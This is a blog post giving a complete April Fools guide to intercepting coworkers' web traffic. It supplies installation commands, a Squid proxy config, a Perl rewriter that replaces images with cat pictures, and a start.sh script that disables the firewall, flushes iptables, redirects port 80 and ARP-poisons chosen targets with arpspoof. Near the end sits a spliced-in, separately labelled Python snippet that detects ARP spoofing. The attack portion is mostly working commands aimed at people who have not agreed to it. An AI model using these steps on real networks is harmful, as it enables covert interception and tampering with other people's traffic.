April Fools 2017 is fast approaching... let's have some fun.

Hacker Cats

For this year's April Fools joke I decided to have a little fun in the office and do a little man-in-the-middle attack, replacing all the images with cats. Most of the code was already out there, but it was outdated and not currently working, so I decided to give it a refresh.

Equipment needed:
  • Raspberry Pi or other Linux PC (I'm using Ubuntu 16.04 on a notebook)
  • SQUID Proxy (version 3.5.12).
  • IPTables for NAT/Redirect to the
  • arpspoof (version 2.4)
  • A sense of Humour

Installation:

Install the required software:

    sudo apt-get update
    sudo apt-get -y install iptables
    sudo apt-get -y install squid     # use squid3 for Raspbian
    sudo apt-get -y install dsniff

Configure squid

Note: if you installed squid3 rather than squid, substitute squid3 in the various places it appears (config file paths, log file paths, systemctl commands etc.).

    sudo cp /etc/squid/squid.conf /etc/squid/squid_orig.conf
    sudo vi /etc/squid/squid.conf

Contents of /etc/squid/squid.conf (version 3.5.X):

    url_rewrite_program /usr/local/bin/cats.pl
    acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
    acl localnet src 192.168.1.0/24 # RFC1918 possible internal network
    acl SSL_ports port 443
    acl Safe_ports port 80 # http
    acl Safe_ports port 21 # ftp
    acl Safe_ports port 443 # https
    acl Safe_ports port 70 # gopher
    acl Safe_ports port 210 # wais
    acl Safe_ports port 1025-65535 # unregistered ports
    acl Safe_ports port 280 # http-mgmt
    acl Safe_ports port 488 # gss-http
    acl Safe_ports port 591 # filemaker
    acl Safe_ports port 777 # multiling http
    acl CONNECT method CONNECT
    http_access deny !Safe_ports
    http_access deny CONNECT !SSL_ports
    http_access allow localhost manager
    http_access deny manager
    http_access allow localhost
    http_access allow localnet
    http_access deny all
    http_port 3128 transparent
    refresh_pattern ^ftp: 1440 20% 10080
    refresh_pattern ^gopher: 1440 0% 1440
    refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
    refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
    refresh_pattern . 0 20% 4320

Note: set the localnet ACL to the IP range of your own local network.

For Raspbian on Squid3 I had to use the following http_port lines:

    http_port 8080
    http_port 3128 intercept

Cats Re-Writer

Create the cats rewriter in /usr/local/bin/cats.pl:

    sudo vi /usr/local/bin/cats.pl
    sudo chmod 755 /usr/local/bin/cats.pl

Contents of /usr/local/bin/cats.pl:

    #!/usr/bin/perl
    # Squid url_rewrite_program helper: answers each request line with either
    # a replacement URL or an empty line (which tells Squid to leave the URL alone).
    use strict;
    use warnings;
    use IO::Handle;

    $| = 1;                  # unbuffered STDOUT: Squid blocks waiting for every reply
    my $count = 0;
    my $pid   = $$;
    my $cats  = 'http://thecatapi.com/api/images/get?format=src';

    open(my $debug, '>>', '/tmp/cats.log') or die "cannot open /tmp/cats.log: $!";
    $debug->autoflush(1);

    print $debug "########################################################################\n";

    # Each line Squid sends is: URL client_ip/fqdn user method [...]
    while (my $line = <STDIN>) {
      chomp $line;
      my ($url) = split / /, $line;

      if ($url =~ /media\.tumblr\.com\/tumblr_/i) {
        # the cat images thecatapi.com hands back live on media.tumblr.com;
        # pass those through untouched, otherwise the cat's own .jpg/.gif URL
        # would be rewritten again and the browser never sees a picture
        print $debug "Input NOSQUID: $url\n";
        print "\n";
        print $debug "Output NOSQUID: $line\n";
      }
      elsif ($url =~ /\.jpg/i) {
        print $debug "Input: $url -> $cats&type=jpg&nosquid\n";
        print "$cats&type=jpg&nosquid\n";
      }
      elsif ($url =~ /\.gif/i) {
        print $debug "Input: $url -> $cats&type=gif&nosquid\n";
        print "$cats&type=gif&nosquid\n";
      }
      elsif ($url =~ /\.png/i) {
        print $debug "Input: $url -> $cats&type=png&nosquid\n";
        print "$cats&type=png&nosquid\n";
      }
      elsif ($url =~ /\.jpeg/i) {
        print $debug "Input: $url -> $cats&type=jpeg&nosquid\n";
        print "$cats&type=jpeg&nosquid\n";
      }
      else {
        print "\n";          # not an image URL: no rewrite
      }
      $count++;
    }
    close $debug;

Running Squid

    systemctl restart squid

Check /var/log/squid/cache.log for any unexpected errors

Script the Attack

    vi start.sh

Contents of start.sh (run it as root, e.g. sudo sh start.sh, since iptables, ip_forward and arpspoof all need it):

    #!/bin/sh
    #--optional if you are using UFW
    echo "Disabling Firewall"
    ufw disable
    #--optional if you are using Apache
    echo "Stopping Apache"
    sudo systemctl stop apache2
    echo "Enabling NAT"
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "Flushing Firewall"
    iptables -F
    iptables -t nat -F      # -F on its own only flushes the filter table, not nat
    echo "Setting Proxy Intercept"
    # the OUTPUT chain only sees connections made from this machine itself; the
    # proxy user is excluded so Squid's own fetches are not redirected back into Squid
    iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner proxy --dport 80 -j REDIRECT --to-port 3128

    #arpspoof -i eth0 192.168.1.1   # arp the whole network according to the man pages, but I've never been able to get this to work for a whole network

    echo "Starting Arp Spoofing"
    arpspoof \
      -t (YOUR TARGET) \
      -t (YOUR TARGET) \
      -i eth0 (YOUR GATEWAY IP)
    #arpspoof will continue to run until control-c is pressed cancelling the spoofing
    sleep 15
    echo "Flushing Firewall"
    iptables -F
    iptables -t nat -F      # the REDIRECT rule lives in the nat table, which plain -F does not touch
    echo "Disabling NAT"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "Enabling UFW"
    ufw enable
    sudo systemctl start apache2
    # Note..  sometimes I have noticed a problem where it does not remove the NAT rule, and the machine needs to be rebooted..

Note: for Raspbian I had to use the following NAT rule. PREROUTING is the chain that forwarded traffic from the spoofed clients actually passes through, whereas the OUTPUT rule above only matches connections made from the proxy machine itself.

    iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

Diagnosing problems

After going through several blogs on various ways to get this working, there are slight nuances between Ubuntu and Raspbian, as well as between NAT and Squid versions. Here are the steps I usually go through to resolve problems:

1) Get the base Squid proxy working with its defaults (point the browser's proxy setting at it to test).
2) Resolve ACL issues in the Squid config.
3) Resolve the "transparent" vs. non-transparent issue with Squid (disable it for direct browser testing). If you get an unexpected "Access Denied", try turning off transparent mode; you can also try "intercept" rather than "transparent".
4) Enable and debug cats.pl.
5) Resolve NAT / redirect issues.
6) Test ARP poisoning.

Note: you usually have to enable and test transparent mode, NAT and ARP spoofing all at the same time.
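Step 6 above, and anyone on the network wondering why every picture is a cat, come down to the same ARP-cache symptom: once arpspoof is running, the gateway IP resolves to the proxy machine's MAC, so two IPs share one hardware address and the gateway's MAC differs from a snapshot taken earlier. The following is an added example, not code from the original post, that reads two /proc/net/arp snapshots (constructed here, with made-up addresses) and flags both symptoms.

```python
"""Detect the ARP-cache symptom of arpspoof on a Linux host: the gateway IP
changes MAC between two snapshots, or two IPs claim the same MAC."""
from collections import defaultdict

def parse_arp_table(text):
    """Parse /proc/net/arp text into {ip: mac}, skipping incomplete entries."""
    table = {}
    for line in text.splitlines()[1:]:          # first line is the header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3]
        if flags == "0x0" or mac == "00:00:00:00:00:00":
            continue                             # incomplete or stale entry
        table[ip] = mac.lower()
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC that more than one IP resolves to."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_changed(previous, current, gateway_ip):
    """True when the gateway's MAC differs between two parsed snapshots."""
    old, new = previous.get(gateway_ip), current.get(gateway_ip)
    return old is not None and new is not None and old != new

def check(previous_text, current_text, gateway_ip="192.168.1.1"):
    """Compare two /proc/net/arp snapshots and report both symptoms."""
    prev, curr = parse_arp_table(previous_text), parse_arp_table(current_text)
    return {"gateway_changed": gateway_changed(prev, curr, gateway_ip),
            "shared_macs": shared_macs(curr)}

# Constructed snapshots: the gateway before the prank, and after arpspoof has
# convinced this host that 192.168.1.1 lives at the proxy box's MAC (...:50).
BEFORE = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        eth0
192.168.1.50     0x1         0x2         aa:bb:cc:00:00:50     *        eth0
"""
DURING = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:50     *        eth0
192.168.1.50     0x1         0x2         aa:bb:cc:00:00:50     *        eth0
"""
```

On a live host, pass check() the contents of /proc/net/arp read a few seconds apart; a non-empty shared_macs result while the prank runs is also exactly what a network admin's ARP monitor would alert on.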

Darryl Burke

Over 25 years of Information Technology, Security, Hardware and Software architecture leadership, focusing on complex systems integration and mission critical applications.

The great white north http://www.burke-consulting.net